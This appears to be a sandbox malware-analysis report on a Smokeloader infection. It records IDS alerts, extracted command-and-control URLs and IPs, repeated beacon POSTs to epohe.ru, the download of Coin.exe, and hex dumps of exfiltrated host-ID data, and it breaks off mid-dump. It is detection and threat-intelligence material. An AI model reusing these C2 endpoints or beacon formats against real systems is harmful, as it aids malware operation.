            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49785 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49785 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49787 -> 102.189.104.201:80
            Source: C:\Windows\explorer.exeNetwork Connect: 102.189.104.201 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 191.96.144.157 443Jump to behavior
            Source: Malware configuration extractorURLs: http://91.202.233.158/e96ea2db21fa9a1b.php
            Source: Malware configuration extractorURLs: http://epohe.ru/tmp/
            Source: Malware configuration extractorURLs: http://olihonols.in.net/tmp/
            Source: Malware configuration extractorURLs: http://nicetolosv.xyz/tmp/
            Source: Malware configuration extractorURLs: http://jftolsa.ws/tmp/
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: 91.202.233.158Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 34 37 34 35 32 37 35 38 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="hwid"0B474527585C3615030116------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="build"default------GDGDHJJDGHCAAAKEHIJK--
            Source: Joe Sandbox ViewIP Address: 91.202.233.158 91.202.233.158
            Source: Joe Sandbox ViewASN Name: M247GB M247GB
            Source: Joe Sandbox ViewASN Name: RAINBOWIDC-AS-APrainbownetworklimitedJP RAINBOWIDC-AS-APrainbownetworklimitedJP
            Source: Joe Sandbox ViewASN Name: RAYA-ASEG RAYA-ASEG
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49763 -> 191.96.144.157:443
            Source: global trafficHTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynvnjwpyrjjaik.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbwviinahwkfdp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrvcprjhuix.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://paladqffwlsbfx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oerusfyadyvfpmjm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbmnkedntct.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esdminlvrkeqcklx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrljtsnfbvqitue.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wddxovmhfhdjjf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mroqivvlsgi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sloulillyitjtj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldwswurfvgvwu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://poatfeiydcmxgiom.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhwdtchfjlofmuv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyovtuslfwnpfvr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agwwkiqfcegkjh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivdbemhblrd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsasppprtpxcq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwrtbbnydhaevbhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scammxgavejetg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjpobfosorxh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tfebikfnyin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkxpvxaevqgmdlaa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fprowwsvixkulpo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwnffqufngll.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxaiuwdsglaywc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wuipisboawsvs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kvkvjbbqhfudfxqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jedxkbbxtvyjefdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgxufuqrjem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jugejrjfmrsbqcyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgcnjvitwupuplla.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://veyluekclhthgug.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdpeyvjwjcxoduxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ngmwxgboyrumd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dppdsmckyoiatanc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iunavucrkiocdvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://weelpnjtteeqb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdaxajnxssfl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://epvctlndxvceigyl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xbdxgcigtdnc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhwbbbidikeuoya.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktmmebudltbr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psyhdeolvmp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ckgifyjrwgvlwluh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtcwkmlaiuwf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asfcixluuutwn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlbunmblotwunq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vfaiilfonqsqudx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: epohe.ru
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjqwiddoadvtn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: epohe.ru
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
            Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: epohe.ru
            Source: global trafficDNS traffic detected: DNS query: www.darkviolet-alpaca-923878.hostingersite.com
            Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynvnjwpyrjjaik.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: epohe.ru
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 